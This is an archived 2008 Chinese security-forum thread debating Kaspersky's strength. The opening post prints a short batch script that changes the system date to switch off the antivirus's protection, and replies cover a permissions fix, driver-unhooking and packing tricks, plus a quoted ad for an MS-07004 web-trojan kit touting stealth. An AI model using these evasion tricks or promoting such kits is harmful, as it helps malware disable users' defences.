Board logo

标题: [讨论]卡巴真的如此之弱? [打印本页]

作者: jjcd    时间: 2008-7-25 13:55     标题: [讨论]卡巴真的如此之弱?

[讨论]卡巴真的如此之弱?
议题作者:peter_yu
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

最近网上盛传一种终止卡巴防护的代码,更有甚者在病毒中添加了此功能,就是更改系统时间,而其确实也能终止xp下kav的防护,不过可能无法终止当设置权限为不允许更改系统时间时的kav…………
普通脚本代码:
@echo off
set date=%date%
date 1981-01-12
ping -n 45 localhost > nul
date %date%
卡巴竟会犯如此低级的错误?
帖子53 精华4 积分3207 阅读权限100 性别男 来自crsky 在线时间99 小时 注册时间2006-2-26 最后登录2008-6-26 查看详细资料TOP 您知道您年薪应是多少?


剑客留香
晶莹剔透§烈日灼然
作者: tdlxdj    时间: 2008-7-25 13:55

由于卡巴斯基会为了防止盗版,实时检测系统日期,以判断软件是否已经超过授权的使用期限。当发现软件许可过期时会立即关闭所有的监控,同时主程序也无法扫描病毒,并且需要用户输入新的序列号。所以这是没办法的事,一直以来KABA一直如此!
帖子17 精华0 积分62 阅读权限40 在线时间13 小时 注册时间2006-10-5 最后登录2007-5-7 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

wyf_1009
晶莹剔透§烈日灼然
作者: ken2    时间: 2008-7-25 13:55

看到小金猪网页上写,可以通过使咔吧的驱动脱钩来实现过主防的目的
不知道这个是怎么实现的。
帖子14 精华0 积分33 阅读权限40 性别男 在线时间11 小时 注册时间2006-8-30 最后登录2008-6-9 查看详细资料TOP 爱要怎么说出口

my咖啡
晶莹剔透§烈日灼然
作者: aaronliu    时间: 2008-7-25 13:55

卡巴的反盗版功能也是他的缺陷,
自己修改下电脑的权限就可以了
在  本地策略—用户权利指派—更改系统时间 里面把所有的帐户都删除
这样这段代码就没有用了.
帖子9 精华0 积分34 阅读权限40 在线时间15 小时 注册时间2007-1-11 最后登录2008-6-17 查看详细资料TOP

net-owl
荣誉会员

作者: 1382926094    时间: 2008-7-25 13:55

楼上的兄弟说的倒是有些意思,利用权限解决问题。
恩,不错当你把不可能变成可能,你会发现你已经被称为高手

帖子158 精华2 积分3724 阅读权限100 性别男 来自北京 在线时间19 小时 注册时间2006-1-14 最后登录2008-5-4 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

pixy
荣誉会员

作者: 轻舞飞扬    时间: 2008-7-25 13:55

卡巴已赢的中国市场,再说垃圾,使用人都比较多。

现在是经济时代,经济地位决定政治地位!与狼共舞!

帖子395 精华10 积分4278 阅读权限100 性别男 来自China 在线时间284 小时 注册时间2007-1-3 最后登录2008-7-18 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

孤单在湖边
晶莹剔透§烈日灼然
作者: last    时间: 2008-7-25 13:55

那这样的话不是很容易就可以KILL掉喀吧么...
作为著名的杀毒软件厂商不是很丢人..简洁是智慧的灵魂!!

帖子6 精华0 积分23 阅读权限40 性别男 来自⒋ 孤魂野鬼`ヤ 在线时间9 小时 注册时间2007-2-24 最后登录2008-5-25 查看个人网站
查看详细资料TOP 让女孩一夜变的更有女人味

aoshi
晶莹剔透§烈日灼然
作者: bbbbf    时间: 2008-7-25 13:55

呵呵  应该所有的产品都是这样 当被大家摸透时就没威胁了
帖子8 精华0 积分21 阅读权限40 在线时间50 小时 注册时间2005-8-22 最后登录2008-7-14 查看详细资料TOP

叛逆
晶莹剔透§烈日灼然
作者: sunnygirl    时间: 2008-7-25 13:55

过卡巴表面内存一句花指令就可以过..楼主的这代码可以过主动吧..
帖子6 精华0 积分23 阅读权限40 性别男 在线时间8 小时 注册时间2007-2-16 最后登录2007-12-2 查看详细资料TOP

叛逆
晶莹剔透§烈日灼然
作者: sherwood5    时间: 2008-7-25 13:55

不过卡巴的主动防御要是不用脚本过得了那应该也是高手了吧..
主动防御不错.就喜欢它的主动 [s:39]
帖子6 精华0 积分23 阅读权限40 性别男 在线时间8 小时 注册时间2007-2-16 最后登录2007-12-2 查看详细资料TOP

gzy21cn
晶莹剔透§烈日灼然
作者: 周星星    时间: 2008-7-25 13:55

这可能是一个漏洞,但卡巴在其它方面确实比很多杀毒软件强,这是不可否认的事实!
帖子9 精华0 积分31 阅读权限40 性别男 在线时间21 小时 注册时间2007-2-18 最后登录2008-7-15 查看详细资料TOP

金州
智囊团成员

作者: 大圣    时间: 2008-7-25 13:55

每种反病毒软件都有其长处,短处。
测试反病毒软件个人感觉主要应该用病毒来测试。
尽量不要用一些木马和一些脚本之类的。
木马和一些远程控制软件异曲同工,有很多机器上有正常的控制软件。
对木马这类的防御更多的不是依靠反病毒软件。而是一些检测判断工具和经验。
关于卡巴的利弊,小小举例一个,
卡巴斯基6.0可以拦截irq中断。这一点会造成一些用户麻烦。甚至在一些电脑上偶然会蓝屏。
但是从另一个角度看,这一点可却说明这个反病毒软件反病毒深度是很强的。
关于反病毒软件,用或者不用,用那一种,罗卜咸菜,各有所爱了。哈哈
不过感觉简单的说它弱,不是很准确。我相信来这里的很多人可能根本不用反病毒软件。或者不大会仅仅依靠反病毒软件。猜测。
以上个人看法。不具权威。:::))人情如冰六月寒,花做一份艳,为谁笑人间?如果任何人发现我转载的有图像的文章中图像失效或者文章有问题,请及时短消息通知我。先谢谢。::)) coup de foudre
帖子1244 精华8 积分6154 阅读权限150 性别男 在线时间593 小时 注册时间2005-3-18 最后登录2008-6-6 查看详细资料TOP

hanjianshuo
晶莹剔透§烈日灼然
作者: kinsaang    时间: 2008-7-25 13:55

卡吧还是比较好用 主动防御真的很不错 其实没有完美的东东的哦
帖子4 精华0 积分16 阅读权限40 性别男 在线时间5 小时 注册时间2006-5-1 最后登录2008-3-26 查看详细资料TOP

叛逆
晶莹剔透§烈日灼然
作者: bmwyun    时间: 2008-7-25 13:55

卡巴对加过冷花指令的杀伤力为0,还没有国内的瑞星强.现在觉得卡巴比不上瑞星..而且性能消耗方面也比不上国产的瑞星..所以..卡巴除了一个主动防御,没有什么好的.(代表我个人观点..)
帖子6 精华0 积分23 阅读权限40 性别男 在线时间8 小时 注册时间2007-2-16 最后登录2007-12-2 查看详细资料TOP

bearorc
晶莹剔透§烈日灼然
作者: 马自达    时间: 2008-7-25 13:55

卡巴用的人多了,自然它的免杀也会多起来,不过它还是很好用的,修改时间的问题我觉得还是提醒下他们,发封信过去吧...让他们用别的方法反盗版..呵呵
帖子3 精华0 积分13 阅读权限40 在线时间0 小时 注册时间2007-1-14 最后登录2007-12-18 查看详细资料TOP

帅得不敢出门
晶莹剔透§烈日灼然
作者: 东莞军人    时间: 2008-7-25 13:55

瑞星的特征码很难改的 有的是不能改  这个做免杀时定位很简单但要一改程序就不能运行了 

这点瑞星还是做的很好 现在其表面查杀功能也变强了 
帖子11 精华0 积分41 阅读权限40 性别男 在线时间13 小时 注册时间2007-3-4 最后登录2008-3-28 查看详细资料TOP

赵子岩
惟一

晶莹剔透§烈日灼然
作者: hycmx    时间: 2008-7-25 13:55

引用:
引用第2楼wyf_1009于2007-02-23 16:48发表的:
看到小金猪网页上写,可以通过使咔吧的驱动脱钩来实现过主防的目的
不知道这个是怎么实现的。
http://xxxxxxxxxx.uu1001.com/read.php?tid=632小金猪 MS-07004网马 V2.0

主要特点
   延时申请内存,达到不卡IE 的目的,另外有Cookie鉴别功能
       24小时内只中一次,可以确保隐蔽性!
  是目前唯一可以在内存128兆计算机下运行的MS-07004网马
   本软件仅供测试之用,请不要用于非法途径!
帖子122 精华2 积分302 阅读权限40 在线时间63 小时 注册时间2006-10-22 最后登录2008-7-24 查看详细资料TOP

Helvin
团队决策人

作者: 骆宗平    时间: 2008-7-25 13:55

我装了两次卡巴,两次最终都打不开了。现在用诺顿幸福,那就是……我饿了,看别人手里拿个肉包子,那他就比我幸福;我冷了,看别人穿了一件厚棉袄,他就比我幸福;我想上茅房,就一个坑,你蹲那了,你就比我幸福。
帖子646 精华22 积分5001 阅读权限255 在线时间1765 小时 注册时间2005-1-7 最后登录2008-7-24 查看详细资料TOP

一挥衣袖
晶莹剔透§烈日灼然
作者: 强劲力量    时间: 2008-7-25 13:55

这个好像脱离了杀软的强弱的讨论范围了,不过卡巴似乎也应该加强对这方面的恶意利用的防范了。
帖子4 精华0 积分16 阅读权限40 性别男 在线时间6 小时 注册时间2007-3-7 最后登录2008-5-15 查看详细资料TOP

sixiang
晶莹剔透§烈日灼然
作者: 86981935    时间: 2008-7-25 13:55

最不爽是玩游戏时候。监控太强。
帖子1 精华0 积分6 阅读权限40 性别男 在线时间7 小时 注册时间2007-1-29 最后登录2008-6-3 查看详细资料TOP

lalaliu
晶莹剔透§烈日灼然
作者: 珉头    时间: 2008-7-25 13:55

卡巴已赢的中国市场,再说垃圾,使用人都比较多。

现在是经济时代,经济地位决定政治地位!一点都不错
帖子1 精华0 积分6 阅读权限40 在线时间0 小时 注册时间2007-2-14 最后登录2008-2-24 查看详细资料TOP

fishcpu
晶莹剔透§烈日灼然
作者: 十六    时间: 2008-7-25 13:55

我现在用的是nod,感觉比卡巴好用
帖子2 精华0 积分9 阅读权限40 在线时间1 小时 注册时间2007-2-9 最后登录2007-3-9 查看详细资料TOP

yongmin
晶莹剔透§烈日灼然
作者: 江湖    时间: 2008-7-25 13:55

卡巴的主动防御不错啊。即使有这样的漏洞,可以再加个ssm这样就可以双重保护你的电脑。
帖子12 精华0 积分38 阅读权限40 性别男 在线时间96 小时 注册时间2006-1-4 最后登录2008-7-23 查看详细资料TOP

376497571
晶莹剔透§烈日灼然
作者: carsoom    时间: 2008-7-25 13:55

越是出名用的人多几越被人搞破坏,vista的盗版问题是个典型案例(比以往的操作系统出现盗版时间周期最短)
帖子3 精华0 积分16 阅读权限40 性别男 在线时间9 小时 注册时间2007-3-4 最后登录2008-1-23 查看详细资料TOP

mike81fang
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2